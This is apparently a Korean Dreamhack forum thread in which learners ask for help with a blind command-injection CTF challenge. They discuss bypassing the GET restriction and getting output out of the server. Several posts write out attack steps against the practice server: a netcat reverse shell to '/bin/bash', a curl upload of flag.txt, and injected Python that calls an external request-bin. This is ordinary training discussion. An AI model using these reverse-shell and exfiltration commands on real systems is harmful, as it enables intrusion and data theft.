blind-command

post로 날려야 커맨드가 실행을 해서 아래와 같이 파이썬으로 작성을 해서 날렸는데 405 에러가 나네요. 다른 문제에서는 됐었는데요.... import requests url = "http://host1.dreamhack.games:12584" res = requests.post(url, data={'cmd':'ls'}) print (res.text) post로 날리려면 어떻게 해야 하나요? 혹시 제가 처음부터 방향성을 잘못 잡고 있는 것인지요?? @.@ 다른 질문들을 읽어봐도.... 어뜨케 하는 건지 도통 모르겠네요. ㅠ.ㅠ 커맨드 실행을 해야 뭐라도 할텐데... 흠..... 왕초보

curl -F "filename=flag.txt" http://ip:port 이거 동작이 안 되는데 다른 방법이 있나요? 이 문제 curl -d 옵션은 됨

답을 풀고 나니 너무 많은 힌트를 유출한것 같아서 질문을 삭제했습니다. 일단은 강의 내용중 실행 결과를 확인할 수 없는 환경 을 잘 보시고 그걸 적용하기 전에는 어떤 방식으로 적용해야 할지는 다른 질문들을 참고하시면 되겠습니다. 헐~ 평소 잘 사용 안하는 것들이라서 어려웠는데, 풀고나니... 그리 어렵지 않네요. ㅎㅎㅎ

서버에 호스트 ip(공인ip):8080 로 nc툴써서 ls 명령어 보내게 하고 호스트에서 nc로 리슨하게 했는데 반응이 전혀없네요..ㅠㅠ 강의보고 한건데 왜 안되는지 잘모르겠습니다 도움 부탁드려요

get method 우회 방법좀 부탁드립니다.

host1.dreamhack.games:23376으로 접속을 했는데 ?cmd=[cmd]이렇게만 뜨는데 이게 맞나요?

nc를 써보든 curl을 써보든 메소드 우회해서 입력하는데 반응이 안오네요.. 똑같이 직접 서버 실행해서 해보면 잘되는데 왜 이럴까요? 힌트라도 주시면 감사하겠습니다.

포트포워딩은 할줄모르고 따른 쉬운방법으로 명령어 결과 나오게 할수 없을까여 ㅠㅠㅠ

서버에서 실행하는 system 명령어(os.system(cmd))에 대한 결과를 확인하기 위해 curl과 python을 이용하여 두개의 요청을 보냈습니다! 그런데 python으로 한 요청의 결과 값이 오지 않는 이유를 모르겠습니다... S_METHOD에는 GET 메소드 대신 사용할 메소드가 들어갔습니다. cmd1을 통한 요청의 응답은 오지 않았고, cmd2를 통한 요청은 응답이 왔습니다 import requests import os link = "https://vmtpmuf.request.dreamhack.games" cmd1 = f"python -c 'import requests; requests.get(\"{link}\")'" cmd2 = "curl -v 'https://vmtpmuf.request.dreamhack.games'" if name == "main": chall_port = int(sys.argv[1]) chall_url = f"http://host1.dreamhack.games:{chall_port}/?cmd={cmd}" #print(cmd) #print(chall_url) #os.system(cmd) response = requests.S_METHOD(chall_url) `

진짜 curl을 사용하는데 POST Method가 안 되면 멀 어케 해야하나요. 진짜 kali에서 어떻게든 하려는데 어떻게 해야 GET인자로 cmd를 줄 수 있나요. (약 5일 후) 제가 메소드를 바꾸는 방법을 알게 된 이후로 많은 변화가 있었습니다. 노트북으로 돌아왔고 우선 kali linux의 Netcat과 Chrome에 있는 Dev http client 를 사용하게 되었다는 점입니다. 문제는 cmd값으로 " nc+ (내 kali_linux ip) +3000(포트번호)+-e+/bin/bash "를 넣어주고 Method 값도 HEAD로 바꿔주고 kali_linux에서는 " nc -lp 3000 " 으로 들을려고 열어놓고 요청 보내니까 약 30초후 또는 3초후에 꺼져버립니다. 리버스쉘이 안 먹히는 건지 서버의 출력을 받아올려는 포트로 데이터가 안 오는 것 같아서 아웃바운드 규칙같은 것도 설정해주고 백신도 혹시 몰라서 꺼줬는데도 이 상태 그대로 입니다. 4일 이상을 삽질했는데 아직도 답을 모르겠습니다. 다들 HTTP관련 문서를 찾아보라고 하는데 몇번을 봐도 모르겠습니다. 뭐가 잘못된 건지, 심지어 데탑에서는 연결은 되는 것 같은데 정보를 출력해주지 않습니다. 그래서 더 미치겠습니다.